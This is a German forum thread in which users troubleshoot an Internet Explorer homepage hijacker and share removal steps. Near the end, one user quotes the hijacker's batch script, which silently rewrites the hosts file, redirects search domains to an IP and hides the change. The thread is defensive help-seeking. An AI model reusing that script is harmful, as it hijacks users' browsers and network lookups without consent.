Startseite erscheint automatisch

@Noxman

Habe es soeben ausprobiert und bei mir lässt er sich problemlos entfernen.

MfG mh1001

IE Deisnstalieren

IE Deinstalation hat auch nichts geholfen Nach einer neuinstal. des IE war die Seite auch wieder da. Eine Formatierung der Festplatte würde das Problem mit sicherheit beheben, aber das ist doch mit sicherheit nicht der richtige weg! Was ist denn wenn sich diese Seite wieder in mein System einschleicht? Hat noch jemand eine Idee was ich versuchen könnte?

@mh1001,

wenn du den internet explorer deinstallierst sieht es tatsächlich so aus als ob er weg wäre. in wirklichkeit werden aber nur alle anzeichen die auf ihn hindeuten, wie icons und verknüpfungen, entfernt. der explorer selbst werkelt im hintergrund munter weiter.

gruss Nox

Hi.
Ich hab da ein ähnliches Problem.
Gebe ich in die Adressleiste ein 'g' ein, erscheint jedesmal Geizkragen.de.
Ich habe alles schon dursucht. Autovervollständigung, Profile, Temp-Ordner und die Registry, usw.
Nix
Dabei war ich nur aus versehen bei denen auf der Seite und sofort wieder weg.
Wie haben die das gemacht?
Gruß
Sptr

Startseite www.search-space.com (Dialer)

hy
das gleiche problem hatte ich auch!
ursache:

c:\windows\navext.dll löschen
Hersteller: Puper
Vorher aus Registry löschen (suchen nach navext.dll) und dann killen!

c:\windows\qttask.exe löschen
ebenfalls von Puper
(was dieses prog gemacht hat weiß ich nicht, aber was solls KILLEN)
Vorher aus run-liste löschen!

ebenso winlogon.exe im windows-verzeichnis!
(run ebenso!)
(nicht zu verwechseln mit winlogon.exe-->>MS aus system32 verzeichnis!)

hatte ich alle drei gleichzzeitig bekommen!

cu
getmanx

Startseite

Die oben genannten Datein, habe ich auf meinem System nicht gefunden. Sie sind nicht vorhanden.

Versuchs doch mal im IE mit Extras, Internetoptionen.
Unter Startseite auf Leere Seite klicken, übernehmen und fertig...

Im I-Explorer Extras anklicken, Internetoptionen, Einstellungen und dann auf Objekte anzeigen. Wenn da was verdächtiges drinsteht kanns du das einfach entfernen. Update Class ist Windowsupdate. Alles andere kann bedenkenlos gelöscht werden. Wenns an einem Dialer liegt, müsste da was drin stehen.

Suche unter "Software entfernen/installieren" nach dubiosen Programmen. Ebenso würde ich mit dem Regcleaner ein bisschen die Registry und den Autostart durchstöbern.
RegCleaner bekommst auf CB. Die ganze Sache mach im Abgesicherten Modus durchführen. Adaware6 im Abgesicherten Modus ist auch keine schlechte Idee.
Das hat nicht geholfen??

Versuchs doch mal im IE mit Extras, Internetoptionen.
Das wäre zu einfach.:D

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main dort mal beim Eintrag "Start Page" nachsehen was dort steht.
Da Du noch nichts zu Deinem BS geschrieben hast, gehe ich von XP aus.

Start-Ausführen-'msconfig'

poste mal was da alles gestartet wird...

@ Timo

Hast du schonmal meinen Tip versucht??

Im I-Explorer Extras anklicken, Internetoptionen, Einstellungen und dann auf Objekte anzeigen. Wenn da was verdächtiges drinsteht kanns du das einfach entfernen. Update Class ist Windowsupdate. Alles andere kann bedenkenlos gelöscht werden. Wenns an einem Dialer liegt, müsste da was drin stehen.

Ich hab geschafft

Hallo Leute, ich habe aus Verzweiflung mein Windows neu instaliert. Das Problem habe ich nicht beseitigen können, deswegen. Kein Tips konnte mir weiter helfen. Trotzdem: Ich Danke allen, die sich bemüht haben mir zu helfen. Ich finde es einfach toll, daß es solche Foren gibt! Macht weiter so. Gruß... Timo

Hm, das klingt doch dann nach einem Programm das du installiert hast, das die Seite aufruft.

Hast dus vielleicht direkt nach der Windows-Installation mal probiert?

Bei GetRight oder DivX z.B. ist z.B. Gator o.ä. dabei, vielleicht liegts daran.

Für's nächstemal

Orginal erstellt von Kuja
ich kämpfe seit Stunden gegen eine aus dem Nirvana erschienene Startseite, die mir mein geliebtes google nach jedem start verteibt.

hab alles versucht, in folgender reihenfolge.

-startseite wieder auf google gestellt
-cache geleert
-url gesperrt
-spybot installiert und alles gelöscht und gebanned was der gefunden hat (der sagt mein rechner wäre nun1a 0_o )

und nix is zu machen

folgende url is nu mein problem, bitte nicht draufgehen wenn ihrnioch sicher seid dass euch nich dasselbe dadruch widerfahren kann (hab keine ahnung davon)

http://81.211.105.8/index.php?v=1

und dann etwas später im Thread:

Orginal erstellt von Kuja
Bei mir is was komisches passiert, hab blanc reingemacht und beim nächsten systemstart war wieder google startseite...

naja problem gelöst

Ich habs gefunden !

Beim NoteBook meines Ex-Schwiegervaters ;)
kam immer wieder die Startseite hp.htm auf, abgelegt unter c:\windows.

Habe dann folgende batch-Datei gefunden, die dies beinhaltete.
War Tricky dies zu finden !!!

@echo off
if exist c:\windows\hp.htm goto act
copy c:\windows\odbs.log c:\windows\hp.htm > nul
goto act
:act
regedit /s srch.reg > nul
attrib -h -s -r c:\windows\system32\drivers\etc\hosts > nul
echo 206.161.200.105 auto.search.msn.com > c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 sitefinder-idn.verisign.com >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 http://www.your.com/ >> c:\windows\system32\drivers\etc\hosts
echo 206.161.200.105 your.com >> c:\windows\system32\drivers\etc\hosts
echo #To disable your family filter just delete all the following lines: >> c:\windows\system32\drivers\etc\hosts
attrib +h +s +r c:\windows\system32\drivers\etc\hosts > nul
exit

hab die datei nun gefunden die das macht

update911.js

gefunden, und mit dem Editor geöffnet

An erster Stelle steht die IP-adresse und weiter unten
die Registry-Eintäge die verändert werden.

In der Registry sucht man dann noch nach der Datei
(update911.js) und ändert den Eintrag in temp.

Zurück
Oben